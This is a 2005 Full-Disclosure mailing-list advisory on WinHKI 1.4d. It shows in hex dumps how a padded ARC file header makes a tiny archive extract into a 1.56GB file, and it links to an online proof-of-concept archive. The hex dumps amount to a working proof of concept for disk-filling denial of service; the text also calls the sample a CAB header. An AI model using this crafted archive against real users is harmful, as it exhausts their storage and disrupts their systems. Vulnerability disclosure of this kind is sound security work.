[Full-Disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB

From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 01/07/05

  • Next message: Steve Kudlak: "Re: [Full-Disclosure] Finnish perlament !?!?!"
    Date: Fri, 07 Jan 2005 01:17:03 +0200
    To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com, Windows NTBugtraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>, vulnwatch@vulnwatch.org, news@securiteam.com, "securitytracker.com" <bugs@securitytracker.com>
    
    

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Application: WinHKI
    Vendors: http://www.webtoolmaster.com
    Versions: 1.4d
    Platforms: Windows
    Bug: ARC File Extraction of 1KB to 1.56GB
    Exploitation: Local (extract file)
    Date: 24 Dec 2004
    Author: Rafel Ivgi, The-Insider
    E-Mail: the_insider@mail.com
    Website: http://theinsider.deep-ice.com

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1) Introduction
    2) Bugs
    3) The Code

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============
    1) Introduction
    ===============

    WinHKI is a file archiever which supports: ARC, BH, CAB, HKI, JAR, LHA,TAR,

    GZ compressions.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ======
    2) Bug
    ======

    This is a normal CAB compressed file header

    00000000 1A02 3235 312E 4854 4D00 5E5E 5E5E 5E1B ..251.HTM.^^^^^.
    00000010 0000 0078 3139 73B5 121B 0000 003C 7363 ...x19s......<sc
    00000020 7269 7074 FB3E 616C 6572 7428 293C 2F73 ript.>alert()</s
    00000030 6372 6970 743E 0D0A 1A00 cript>....

    By adding after the filename header a certain amount of chars
    and replacing all nulls (00) with FF (in order to avoid our
    long string from being terminated)

    00000000 1A02 3235 312E 4854 4DFF 5E5E 5E5E 5EFF ..251.HTM.^^^^^.
    00000010 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000020 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000030 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000040 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000050 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000060 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000070 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000080 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000090 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000000A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000000B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000000C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000000D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000000E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000000F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000100 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000110 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000120 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000130 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000140 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000150 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000160 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000170 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000180 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000190 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000001A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000001B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000001C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000001D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000001E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000001F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000200 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000210 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000220 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000230 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000240 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000250 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000260 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000270 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000280 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000290 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000002A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000002B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000002C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000002D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000002E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000002F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000300 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000310 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000320 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000330 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000340 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000350 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000360 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000370 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000380 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000390 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000003A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000003B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000003C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000003D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000003E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    000003F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF ................
    00000400 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FF1B ................
    00000410 FFFF FF78 3139 73B5 121B FFFF FF3C 7363 ...x19s......<sc
    00000420 7269 7074 FB3E 616C 6572 7428 293C 2F73 ript.>alert()</s
    00000430 6372 6970 743E 0D0A 1A00 cript>....

    HKI will create a 1.56 GIGA BYTE file on at the selected extract location.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===========
    3) The Code
    ===========

    An online proof of concept can be found at:
    http://theinsider.deep-ice.com/hki156gb.ARC

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ---
    Rafel Ivgi, The-Insider
    http://theinsider.deep-ice.com
    "Scripts and Codes will make me D.O.S , but they will never HACK me."
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
    

  • Next message: Steve Kudlak: "Re: [Full-Disclosure] Finnish perlament !?!?!"

    Relevant Pages